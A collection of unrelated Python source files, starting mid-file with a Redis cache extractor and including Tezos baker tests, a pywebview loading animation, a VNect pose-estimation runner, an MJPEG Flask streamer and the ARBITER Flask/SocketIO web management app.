self.info['totals']['total_bytes_redis_cache_downloaded'] / 1048576.0)
self.info['totals']['total_human_readable_mb_results_decompressed'] = '%.3f' % (
self.info['totals']['total_bytes_results_decompressed'] / 1048576.0)
self.info['totals']['total_human_readable_mb_per_second'] = '%.3f' % (
self.info['totals']['total_bytes_per_second'] / 1048576.0)
if self.info['totals']['total_bytes_redis_cache_downloaded'] != 0:
self.info['totals']['total_compression_ratio'] = '%.3f' % (float(self.info['totals'][
'total_bytes_results_decompressed']) / float(self.info['totals']['total_bytes_redis_cache_downloaded']))
##########################################################################
def threaded_object_extractor(self, redis_server):
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
redis_pipeline = redis_connection.pipeline()
import time
self.info['redis_servers'][redis_server] = {}
self.info['redis_servers'][redis_server][self._uuid] = {}
self.info['redis_servers'][redis_server][
self._uuid]['redis_server'] = redis_server
self.info['redis_servers'][redis_server][
self._uuid]['time_start'] = time.time()
self.info['redis_servers'][redis_server][self._uuid][
'keys_matched'] = len(self._named_object_results[redis_server])
self._object_store[redis_server] = []
try:
for named_object in self._named_object_results[redis_server]:
if self._contents:
redis_pipeline.lindex(named_object, self._index_contents)
elif self._md5sum:
redis_pipeline.lindex(named_object, self._index_md5sum)
elif self._stat:
redis_pipeline.lindex(named_object, self._index_stat)
elif self._wordcount:
redis_pipeline.lindex(named_object, self._index_wordcount)
elif self._time:
redis_pipeline.lindex(named_object, self._index_time)
# This lies outside the loop of named_objects. The pipeline.execute() below will issue a single redis query to fetch everything at once.
            # By using pipelines instead of individual fetches, this reduces cross communication between the client and server. See here for more details.
# https://github.com/andymccurdy/redis-py
self._object_store[redis_server] = redis_pipeline.execute()
except redis.exceptions.ResponseError, e:
print "CacheExtractor.threaded_object_extractor() Exception " + str(e)
sys.exit(1)
# The named objects array and object store arrays should be a 1-to-1 mapping at this point. Iterate over both arrays in parallel.
# named_object_results[redis_server] = names of the keys
# object_store[redis_server] = whatever we extracted from the redis server for all of the keys
# gold[name of key] = whatever we extracted
self.info['redis_servers'][redis_server][
self._uuid]['bytes_redis_cache_downloaded'] = 0
self.info['redis_servers'][redis_server][
self._uuid]['bytes_results_decompressed'] = 0
uniques = {}
while self._named_object_results[redis_server]:
named_object = self._named_object_results[redis_server].pop()
host, file = named_object.split('#')
if self._object_store[redis_server]:
# We are in data extraction mode with contents, md5sum, stat,
# wordcount, or time
contents_of_named_object = self._object_store[
redis_server].pop()
if contents_of_named_object:
decompressed_data = bz2.decompress(
contents_of_named_object)
self.info['redis_servers'][redis_server][self._uuid][
'bytes_redis_cache_downloaded'] += sys.getsizeof(contents_of_named_object)
self.info['redis_servers'][redis_server][self._uuid][
'bytes_results_decompressed'] += sys.getsizeof(decompressed_data)
if self._return_randomized_servers == "True":
self._gold[named_object] = decompressed_data
else:
self._gold[
named_object + "@" + redis_server] = decompressed_data
else:
# We are either in --search or --list-files operations. We didn't actually extract data. if we are in --list-files, we want a list of unique
# objects, so we build a dictionary to perform the uniques for
# us.
if self._list_files:
uniques[file] = 1
else:
# We are searching, so we want non-unique filename objects
# across multiple hosts
if self._return_randomized_servers == "True":
self._gold[named_object] = None
else:
self._gold[named_object + "@" + redis_server] = None
if self._verbose:
print "(+) CacheExtractor.threaded_object_extractor() file " + file + " from host " + host + " discovered from redis server " + redis_server
if self._list_files:
for file in uniques.iterkeys():
self._gold['files#' + file] = None
# Update per-redis server information and publish to each redis server its own statistics
# Calculate data transfer in bytes
self.info['redis_servers'][redis_server][
self._uuid]['time_finished'] = time.time()
self.info['redis_servers'][redis_server][self._uuid]['time_elapsed'] = self.info['redis_servers'][
redis_server][self._uuid]['time_finished'] - self.info['redis_servers'][redis_server][self._uuid]['time_start']
self.info['redis_servers'][redis_server][self._uuid]['bytes_per_second'] = int(self.info['redis_servers'][redis_server][
self._uuid]['bytes_redis_cache_downloaded'] / self.info['redis_servers'][redis_server][self._uuid]['time_elapsed'])
if self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded'] != 0:
self.info['redis_servers'][redis_server][self._uuid]['compression_ratio'] = '%.3f' % (float(self.info['redis_servers'][redis_server][
self._uuid]['bytes_results_decompressed']) / float(self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded']))
        # Convert to megabytes so it's somewhat more human-readable.
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_redis_cache_downloaded'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded'] / 1048576.0)
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_results_decompressed'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_results_decompressed'] / 1048576.0)
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_per_second'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_per_second'] / 1048576.0)
# Append the global query information
self.info['redis_servers'][redis_server][
self._uuid]['query'] = self.info['query']
# Send to sysops-api
redis_connection.publish(
'sysops-api', json.dumps(self.info['redis_servers'][redis_server]))
##########################################################################
|
test_baker_operations_cli_options.py
|
"""Simple tests to check support for the following operations-related options
for baking
- --ignore-node-mempool
- --operations-pool [file|uri]
"""
import os
import os.path
import json
import time
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from typing import List, Any
import pytest
from client.client import Client
from tools import constants, utils
from launchers.sandbox import Sandbox
from . import protocol
PORT = 12121
OPERATIONS_FILES_DIRECTORY = "operations_files"
EMPTY_OPERATIONS = "empty_operations"
ABSENT_OPERATIONS = "this_file_should_not_exist"
SINGLETON_OPERATIONS = "singleton_operations"
TEST_DIR = "tests_alpha"
class MyHttpServer:
"""Simple HTTP server launching in a separate process"""
def __init__(self):
server_address = ('localhost', PORT)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
process = Process(target=httpd.serve_forever, args=())
self.process = process
self.server = httpd
def run(self):
self.process.start()
def close(self):
self.server.server_close()
self.process.terminate()
@pytest.fixture
def http_server():
server = MyHttpServer()
server.run()
yield server
server.close()
def get_filename(basename: str) -> str:
return os.path.join(
TEST_DIR, OPERATIONS_FILES_DIRECTORY, f"{basename}.json"
)
class TestIgnoreNodeMempool:
def test_ignore(self, client: Client):
"""Check that a transfer injected into the node is dutifully ignored
when baking with --ignore-node-mempool
"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
client.transfer(2, sender, 'bootstrap5')
utils.bake(
client, bake_args=['--minimal-timestamp', "--ignore-node-mempool"]
)
balance1 = client.get_balance(sender)
        # Make sure the operation has not been included; check indirectly
        # through balances
assert balance1 == balance0
assert client.get_level() == 2
def test_no_ignore(self, client: Client):
"""Check that a transfer injected, then ignored, can be injected at the
next block"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_balance(sender)
assert balance1 != balance0
assert client.get_level() == 3
def all_empty(lls: List[List[Any]]) -> bool:
return all(map(lambda l: len(l) == 0, lls))
def only_has_endorsements(lls: List[List[Any]]) -> bool:
return all(map(lambda x: x[0] == 0 or len(x[1]) == 0, enumerate(lls)))
def mempool_to_operations(mempool):
def to_op(applied_op):
operation = {}
operation['branch'] = applied_op['branch']
operation['contents'] = applied_op['contents']
operation['signature'] = applied_op['signature']
return operation
return [to_op(applied_op) for applied_op in mempool['applied']]
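# Illustrative mempool shape (values hypothetical): mempool_to_operations()
# above assumes client.get_mempool() returns something like
#   {"applied": [{"branch": "BL...", "contents": [...], "signature": "sig..."}]}
# and keeps only the branch/contents/signature fields of each applied op.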
def get_operations(client: Client) -> List[dict]:
return mempool_to_operations(client.get_mempool())
class TestExternalOperations:
def test_bake_empty_operations_file(self, client: Client):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
get_filename(EMPTY_OPERATIONS),
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert all_empty(head['operations'])
    # http_server is a fixture that auto-runs and closes said HTTP server
# pylint: disable=W0613
def test_bake_empty_operations_http(self, client: Client, http_server):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{get_filename(EMPTY_OPERATIONS)}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_absent_operations_file(self, client: Client):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
# pylint: disable=W0613
def test_bake_absent_operations_http(self, client: Client, http_server):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
# any fake URL would do here
f"http://localhost:{PORT}/{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_singleton_operations_file_pre(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, and bake it.
        Store it into the context to serve as a dynamic oracle for the next
steps.
"""
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
session['amount'] = 2
client.transfer(session['amount'], sender, 'bootstrap3')
# Baking
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_mutez_balance(sender)
session['difference'] = balance0 - balance1
assert session['difference'] >= session['amount']
utils.bake(client)
def test_bake_singleton_operations_file(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, put it into a file,
and bake it into the chain through --operations-pool option.
This additionally compares the balance to a normal transfer (through the
node's mempool) to check that there is no observable difference in
behaviors between passing through a node's mempool or a hand-rolled
operations file.
"""
sender = 'bootstrap4'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
# Baking
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
file,
'--ignore-node-mempool',
],
)
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# pylint: disable=W0613
def test_bake_singleton_operations_http(
self, client: Client, sandbox: Sandbox, session: dict, http_server
):
# Restart
sandbox.node(0).terminate()
sandbox.node(0).run()
client.check_node_listening()
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{file}",
'--ignore-node-mempool',
],
)
sandbox.client(0).rpc('get', '/chains/main/blocks/head')
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# The 5 bootstrap accounts
ALL_BOOTSTRAP_ACCOUNTS = [f'bootstrap{i + 1}' for i in range(5)]
@pytest.mark.incremental
class TestBakerExternalOperations:
"""Test adding an external operations source (file) {}to a baker daemon"""
def test_init(self, sandbox: Sandbox):
sandbox.add_node(0, params=constants.NODE_PARAMS)
parameters = protocol.get_parameters()
parameters['minimal_block_delay'] = "1"
parameters["delay_increment_per_round"] = "1"
protocol.activate(
sandbox.client(0),
parameters=parameters,
activate_in_the_past=False,
)
def test_gen_operations(self, sandbox: Sandbox, session: dict):
"""Generate a transfer operation and save it to a file"""
client = sandbox.client(0)
client.multibake(args=['--minimal-timestamp'])
client.transfer(3, 'bootstrap1', 'bootstrap3')
client.multibake(args=['--minimal-timestamp'])
client.multibake(args=['--minimal-timestamp'])
# We are now at level 2, next block at level 4
level = client.get_level()
session['level'] = level
assert level == 4
assert len(get_operations(client)) == 0
time.sleep(3)
session['transfer_value'] = 2
client.transfer(session['transfer_value'], 'bootstrap1', 'bootstrap3')
pending_ops = get_operations(client)
# Write the transaction to a file
filename = get_filename(SINGLETON_OPERATIONS)
session['operations_file'] = filename
with open(filename, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
def test_terminate_sandbox(self, sandbox: Sandbox):
"""Cleanup the node's mempool. Forget about the last transfer"""
sandbox.node(0).terminate()
# let the node end gracefully before restarting
time.sleep(1)
def test_baker(self, sandbox: Sandbox, session: dict):
"""Restart the node and add a baker daemon"""
sandbox.node(0).run()
assert sandbox.client(0).check_node_listening()
assert os.path.isfile(session['operations_file'])
sandbox.add_baker(
0,
ALL_BOOTSTRAP_ACCOUNTS,
proto=protocol.DAEMON,
log_levels=constants.TENDERBAKE_BAKER_LOG_LEVELS,
run_params=[
'--operations-pool',
session['operations_file'],
'--liquidity-baking-toggle-vote',
'pass',
],
)
@pytest.mark.timeout(30)
def test_wait_until_high_enough_level(
self, sandbox: Sandbox, session: dict
):
"""Wait until we have seen enough blocks.
This should not take much time."""
while sandbox.client(0).get_level() < 2 * session['level']:
time.sleep(1)
def test_check_block_baked(self, sandbox: Sandbox, session: dict):
"""Check that block exactly contains the operations that we put into
our operations file"""
expected_level = session['level']
block = sandbox.client(0).rpc(
'get', f'/chains/main/blocks/{expected_level}'
)
manager_ops = block['operations'][3]
assert len(manager_ops) == 1
assert int(
manager_ops[0]['contents'][0]['amount']
) == utils.mutez_of_tez(session['transfer_value'])
def test_check_block_after_baked(self, sandbox: Sandbox, session: dict):
"""Check that block is empty of operations"""
level = session['level'] + 1
block = sandbox.client(0).rpc('get', f'/chains/main/blocks/{level}')
assert only_has_endorsements(block['operations'])
# cleanup the operation file
os.remove(session['operations_file'])
|
loading_animation.py
|
import webview
import threading
"""
This example demonstrates a simple loading animation workflow
"""
def load_html():
webview.load_html("""
<style>
body {
background-color: #333;
color: white;
font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
}
.main-container {
width: 100%;
height: 90vh;
display: flex;
display: -webkit-flex;
align-items: center;
-webkit-align-items: center;
justify-content: center;
-webkit-justify-content: center;
overflow: hidden;
}
.loading-container {
}
.loader {
font-size: 10px;
margin: 50px auto;
text-indent: -9999em;
width: 3rem;
height: 3rem;
border-radius: 50%;
background: #ffffff;
background: -moz-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -webkit-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -o-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -ms-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: linear-gradient(to right, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
position: relative;
-webkit-animation: load3 1.4s infinite linear;
animation: load3 1.4s infinite linear;
-webkit-transform: translateZ(0);
-ms-transform: translateZ(0);
transform: translateZ(0);
}
.loader:before {
width: 50%;
height: 50%;
background: #ffffff;
border-radius: 100% 0 0 0;
position: absolute;
top: 0;
left: 0;
content: '';
}
.loader:after {
background: #333;
width: 75%;
height: 75%;
border-radius: 50%;
content: '';
margin: auto;
position: absolute;
top: 0;
left: 0;
bottom: 0;
right: 0;
}
@-webkit-keyframes load3 {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes load3 {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
.loaded-container {
display: none;
}
</style>
<body>
<div class="main-container">
<div id="loader" class="loading-container">
<div class="loader">Loading...</div>
</div>
<div id="main" class="loaded-container">
<h1>Content is loaded!</h1>
</div>
</div>
<script>
setTimeout(function() {
document.getElementById('loader').style.display = 'none'
document.getElementById('main').style.display = 'block'
}, 5000)
</script>
</body>
""")
if __name__ == '__main__':
t = threading.Thread(target=load_html)
t.start()
webview.create_window('Background color', background_color='#333333')
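    # Note: create_window() blocks until the window is closed, so the HTML must
    # be loaded from the background thread started above.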
|
run_estimator_ps.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import cv2
import time
import numpy as np
import multiprocessing as mp
from src import utils
from src.hog_box import HOGBox
from src.estimator import VNectEstimator
##################
### Parameters ###
##################
# the input camera serial number in the PC (int), or PATH to input video (str)
# video = 0
video = './pic/test_video.mp4'
# whether apply transposed matrix (when camera is flipped)
# T = True
T = False
# vnect input image size
box_size = 368
# parent joint indexes of each joint (for plotting the skeletal lines)
joint_parents = [16, 15, 1, 2, 3, 1, 5, 6, 14, 8,
9, 14, 11, 12, 14, 14, 1, 4, 7, 10,
13]
#######################
### Initializations ###
#######################
def init():
# initialize VNect estimator
global estimator
estimator = VNectEstimator()
# catch the video stream
global camera_capture
camera_capture = cv2.VideoCapture(video)
assert camera_capture.isOpened(), 'Video stream not opened: %s' % str(video)
global W_img, H_img
W_img, H_img = (int(camera_capture.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(camera_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
################
### Box Loop ###
################
# use a simple HOG method to initialize bounding box
def hog_box():
hog = HOGBox()
## click the mouse when ideal bounding box appears ##
success, frame = camera_capture.read()
# initialize bounding box as the maximum rectangle
rect = [0, 0, W_img, H_img]
while success and cv2.waitKey(1) == -1:
if T:
# if not calling .copy(), an unexpected bug occurs
# mirror
# frame = np.transpose(frame, axes=[1, 0, 2]).copy()
# no mirror
frame = np.rot90(frame, 3).copy()
choose, rect = hog(frame)
if choose:
break
success, frame = camera_capture.read()
# return the bounding box params (x, y, w, h)
return rect
#################
### Main Loop ###
#################
## trigger any keyboard events to stop the loop ##
def main(q_start3d, q_joints):
init()
x, y, w, h = hog_box()
q_start3d.put(True)
success, frame = camera_capture.read()
while success and cv2.waitKey(1) == -1:
if T:
# mirror
# frame = np.transpose(frame, axes=[1, 0, 2])
# no mirror
frame = np.rot90(frame, 3)
# crop bounding box from the raw frame
frame_cropped = frame[y:y + h, x:x + w, :]
# vnect estimation
joints_2d, joints_3d = estimator(frame_cropped)
q_joints.put(joints_3d)
# 2d plotting
joints_2d[:, 0] += y
joints_2d[:, 1] += x
frame_draw = utils.draw_limbs_2d(frame.copy(), joints_2d, joint_parents, [x, y, w, h])
frame_draw = utils.img_scale(frame_draw, 1024 / max(W_img, H_img))
cv2.imshow('2D Prediction', frame_draw)
# update bounding box
y_min = (np.min(joints_2d[:, 0]))
y_max = (np.max(joints_2d[:, 0]))
x_min = (np.min(joints_2d[:, 1]))
x_max = (np.max(joints_2d[:, 1]))
buffer_x = 0.8 * (x_max - x_min + 1)
buffer_y = 0.2 * (y_max - y_min + 1)
x, y = (max(int(x_min - buffer_x / 2), 0),
max(int(y_min - buffer_y / 2), 0))
w, h = (int(min(x_max - x_min + buffer_x, W_img - x)),
int(min(y_max - y_min + buffer_y, H_img - y)))
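        # Example with illustrative numbers: joints spanning x 100..200 and
        # y 50..350 give buffer_x = 0.8 * 101 and buffer_y = 0.2 * 301, i.e. the
        # box is padded by ~40% of its width and ~10% of its height per side.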
# update frame
success, frame = camera_capture.read()
# angles_file.close()
try:
camera_capture.release()
cv2.destroyAllWindows()
except Exception as e:
print(e)
raise
if __name__ == '__main__':
q_start3d = mp.Queue()
q_joints = mp.Queue()
ps_main = mp.Process(target=main, args=(q_start3d, q_joints))
ps_plot3d = mp.Process(target=utils.plot_3d,
args=(q_start3d, q_joints, joint_parents),
daemon=True)
ps_main.start()
ps_plot3d.start()
ps_main.join()
|
web_server.py
|
import Queue
import io
import logging
import threading
import PIL.Image
import pika
from flask import Flask, Response
import config
logging.basicConfig(level=logging.INFO)
app = Flask(__name__)
queue = Queue.Queue(1)
def populate_queue():
def callback(ch, method, properties, body):
image_stream = io.BytesIO()
image_stream.write(body)
image_stream.seek(0)
image = PIL.Image.open(image_stream)
image.verify()
image_stream.seek(0)
queue.put(image_stream)
queue_channel.basic_consume(callback, queue=queue_name, no_ack=True)
queue_channel.start_consuming()
def generate():
while True:
image_stream = queue.get()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + image_stream.read() + b'\r\n')
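# Each yielded chunk is one MJPEG part; combined with the
# "multipart/x-mixed-replace; boundary=frame" mimetype below, browsers render
# the stream as a continuously refreshing image.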
@app.route('/')
def index():
print 'Connected client on thread:', threading.current_thread().name
return Response(generate(), mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == "__main__":
print 'Connecting to queue server'
queue_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=config.get('queue_server_host'), port=int(config.get('queue_server_port'))))
queue_channel = queue_connection.channel()
queue_channel.exchange_declare(exchange='images', exchange_type='fanout')
result = queue_channel.queue_declare(exclusive=True)
queue_name = result.method.queue
queue_channel.queue_bind(exchange='images', queue=queue_name)
socket_server_thread = threading.Thread(target=populate_queue)
socket_server_thread.daemon = True
socket_server_thread.start()
try:
print 'Started web server on main thread:', threading.current_thread().name
app.run(host=config.get('web_server_host'), port=int(config.get('web_server_port')), threaded=True, debug=False)
except KeyboardInterrupt:
pass
print 'Closing queue connection'
queue_connection.close()
|
web.py
|
"""
ARBITER.
▄▄▄ ██▀███ ▄▄▄▄ ██▓▄▄▄█████▓▓█████ ██▀███
▒████▄ ▓██ ▒ ██▒▓█████▄ ▓██▒▓ ██▒ ▓▒▓█ ▀ ▓██ ▒ ██▒
▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▒██▒▒ ▓██░ ▒░▒███ ▓██ ░▄█ ▒
░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ░██░░ ▓██▓ ░ ▒▓█ ▄ ▒██▀▀█▄
▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓░██░ ▒██▒ ░ ░▒████▒░██▓ ▒██▒
▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▓ ▒ ░░ ░░ ▒░ ░░ ▒▓ ░▒▓░
▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ▒ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
Made by perpetualCreations
web.py, handles running the web management application.
"""
import configparser
import json
import threading
from os import urandom
from ast import literal_eval
from hashlib import sha3_512
from datetime import datetime, timezone
import flask
import flask_login
import flask_socketio
import swbs
config = configparser.ConfigParser()
config.read("/etc/ARBITER/web.cfg")
arbiter_config = configparser.ConfigParser()
arbiter_config.read("/etc/ARBITER/init.cfg")
application = flask.Flask(__name__)
application.secret_key = urandom(4096)
login_manager = flask_login.LoginManager()
login_manager.init_app(application)
login_manager.login_view = "login"
users = {"username": "admin"}
socket_io = flask_socketio.SocketIO(application)
# all error messages get appended to this list, new clients will receive all
# error messages in list, to "catch them up"
errors: list = []
# dictionary overwritten when the directives database dispatches an update,
# sent to new clients instead of fetching database contents again
directives_database_cache: dict = {}
@socket_io.on("logError")
def log_error_broadcaster(message: str):
"""Emit event logError to all clients as a broadcast."""
error = {"timestamp":
datetime.utcnow().replace(tzinfo=timezone.utc).isoformat(),
"message": message}
errors.append(error)
with application.app_context():
flask_socketio.emit("logError", error, json=True, broadcast=True,
namespace="/")
class User(flask_login.UserMixin):
"""Flask user model."""
@login_manager.user_loader
def user_loader(user_id) -> User:
"""Flask Login function required for loading the admin user."""
user = User()
# pylint: disable=attribute-defined-outside-init
# pylint: disable=invalid-name
user.id = user_id
return user
@socket_io.on("connect")
def connect_handler() -> any:
"""Handle websocket connections, checking for login auth."""
if flask_login.current_user.is_authenticated is not True:
return False
else:
with application.app_context():
for error in errors:
flask_socketio.emit("logError", error, json=True)
flask_socketio.emit("eventUpdate", directives_database_cache,
json=True)
class InterfaceClient(swbs.Client):
"""Socket interface instance class."""
def __init__(self, host, port, key, key_is_path):
"""Class initialization."""
super().__init__(host, port, key, key_is_path)
self.dead = False
def connect_wrapper(self) -> None:
"""
Serve as a wrapper for swbs.Client.connect.
Has additional calls to specify ARIA protocol.
"""
# pylint: disable=broad-except
try:
self.connect()
type_request = self.receive()
if type_request == "REQUEST TYPE":
self.send("FORESIGHT")
if self.receive() == "ABORT":
self.disconnect()
error_string = "Host " + self.host + " raised ABORT. " + \
"Interface client will shutdown."
print(error_string)
log_error_broadcaster(error_string)
self.dead = True
else:
self.send("KEYERROR")
self.disconnect()
error_string = "Host " + self.host + \
" failed to send host request type, expected " + \
'"REQUEST TYPE"' + ", got " + type_request + "." + \
" Interface client will shutdown."
print(error_string)
log_error_broadcaster(error_string)
self.dead = True
except BaseException as parent_exception:
error_string = "Failed to initialize interface host " + \
"connecting to " + self.host + " on port " + str(self.port) + \
". Interface client will shutdown."
print(str(parent_exception) + " -> " + error_string)
log_error_broadcaster(error_string)
self.dead = True
def update_listener() -> None:
"""Thread for update events issued by the main ARBITER server."""
# probably a warcrime
# pylint: disable=global-statement
# pylint: disable=invalid-name
global directives_database_cache
set_update = False
arbiter_updater_interface = \
InterfaceClient("127.0.0.1", arbiter_config["server"]["port"],
arbiter_config["security"]["key"],
arbiter_config["security"]["key_is_path"])
while arbiter_updater_interface.dead is False:
while flask_login.current_user is None:
pass
if set_update is False:
arbiter_updater_interface.send("UPDATE")
if arbiter_updater_interface.receive() == "OK":
set_update = True
continue
else:
error_string = "Host does not support event updating, " + \
"any display elements in the interfacce will not " + \
"update. Exiting listener."
print(error_string)
log_error_broadcaster(error_string)
return None
update_header_data = arbiter_updater_interface.receive().split(" ")
if len(update_header_data) == 2 and \
update_header_data[1] in ["STATE", "TABLE"]:
arbiter_updater_interface.send("OK")
update_content_data = \
arbiter_updater_interface.receive()
if update_header_data[1] == "TABLE":
# pylint: disable=broad-except
try:
update_content_data = literal_eval(update_content_data)
except BaseException as parent_exception:
error_string = "Table data could not be interpreted, " + \
"raised exception: " + str(parent_exception)
print(error_string)
log_error_broadcaster(error_string)
return None
directives_database_cache = {"data": update_content_data,
"id": update_header_data[0],
"type": update_header_data[1]}
with application.app_context():
flask_socketio.emit("eventUpdate", directives_database_cache,
json=True, broadcast=True)
arbiter_updater_interface.send("OK")
else:
arbiter_updater_interface.send("KEYERROR")
error_string = "Received update with invalid header, content: " + \
str(update_header_data)
print(error_string)
log_error_broadcaster(error_string)
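# Illustrative exchange with the ARBITER server, inferred from the handlers
# above (message values are examples, not captured traffic):
#   client -> "UPDATE"              server -> "OK"
#   server -> "<id> TABLE"          client -> "OK"
#   server -> "{'directive': ...}"  client -> "OK"   (cached and broadcast)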
# interface inits
threading.Thread(target=update_listener, args=()).start()
arbiter_command_interface = \
InterfaceClient("127.0.0.1", arbiter_config["server"]["port"],
arbiter_config["security"]["key"],
arbiter_config["security"]["key_is_path"])
arbiter_command_interface_lock = threading.Lock()
@socket_io.on("command")
def command_handler(json_payload) -> None:
"""Handle websocket command request events from clients."""
json_payload = str(json_payload).replace("'", '"')
command_payload = json.loads(json_payload)
if arbiter_command_interface.dead is True:
return None
arbiter_command_interface_lock.acquire(True)
if command_payload["requestType"] == "SIGNAL":
arbiter_command_interface.send(command_payload["command"])
elif command_payload["requestType"] == "PAYLOAD":
arbiter_command_interface.send(command_payload["command"])
if arbiter_command_interface.receive() == "KEYERROR":
error_string = "Payload command " + \
command_payload["command"] + " is invalid."
print(error_string)
log_error_broadcaster(error_string)
arbiter_command_interface_lock.release()
return None
arbiter_command_interface.send(command_payload["payload"])
else:
error_string = "Received invalid requestType, expected " + \
'"SIGNAL" or "PAYLOAD", got ' + \
command_payload["requestType"] + ". Request ignored."
print(error_string)
log_error_broadcaster(error_string)
arbiter_command_interface_lock.release()
@application.route("/")
@flask_login.login_required
def index() -> any:
"""
Render index.html when root is requested.
Serves as homepage with control panels.
Requires login.
:return: any
"""
return flask.render_template("index.html", serverid=config["CORE"]["ID"])
@application.route("/password/", methods=["GET", "POST"])
@flask_login.login_required
def change_password() -> any:
"""
Render change_password.html when requested with GET.
Serves as utility page for changing the admin password.
Validates and commits password change when requested with POST.
Re-renders page with an error message if re-typed password is different.
Requires login.
:return: any
"""
if flask.request.method == "GET":
return flask.render_template("change_password.html",
serverid=config["CORE"]["ID"], error="")
elif flask.request.method == "POST":
if flask.request.form["password"] == \
flask.request.form["password_affirm"]:
config["CORE"]["PASSWORD"] = sha3_512(
flask.request.form["password"].encode("ascii")).hexdigest()
with open("main.cfg", "wb") as config_overwrite:
config.write(config_overwrite)
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template(
"change_password.html", serverid=config["CORE"]["ID"],
error="Passwords don't match.", form=flask.request.form)
else:
flask.abort(405)
@application.route("/login/", methods=["GET", "POST"])
def login() -> any:
"""
Render login.html when requested with GET.
Serves as login page for users to authenticate themselves.
Validates password submissions when requested with POST,
and redirects to root.
Re-renders page with an error message if password is invalid
when compared to hash.
:return: any
"""
if flask.request.method == "GET":
if flask_login.current_user.is_authenticated is True:
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template("login.html",
serverid=config["CORE"]["ID"],
error="")
elif flask.request.method == "POST":
if sha3_512(flask.request.form["password"].encode("ascii", "replace")
).hexdigest() == config["CORE"]["PASSWORD"]:
user = User()
# pylint: disable=attribute-defined-outside-init
user.id = users["username"]
flask_login.login_user(user)
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template("login.html",
serverid=config["CORE"]["ID"],
error="Invalid password.")
else:
flask.abort(405)
@application.route("/logout/")
@flask_login.login_required
def logout() -> any:
"""
Log out user session, and redirect to login page.
Requires login.
:return: any
"""
flask_login.logout_user()
